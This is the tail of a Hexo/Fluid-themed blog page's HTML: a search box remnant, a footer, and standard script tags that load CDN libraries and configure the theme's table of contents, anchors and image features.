          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">博客在允许 JavaScript 运行的环境下浏览效果更佳</div>
  </noscript>
<!-- hexo injector body_end start --><script src="/js/backgroundize.js"></script><!-- hexo injector body_end end --></body>
</html>
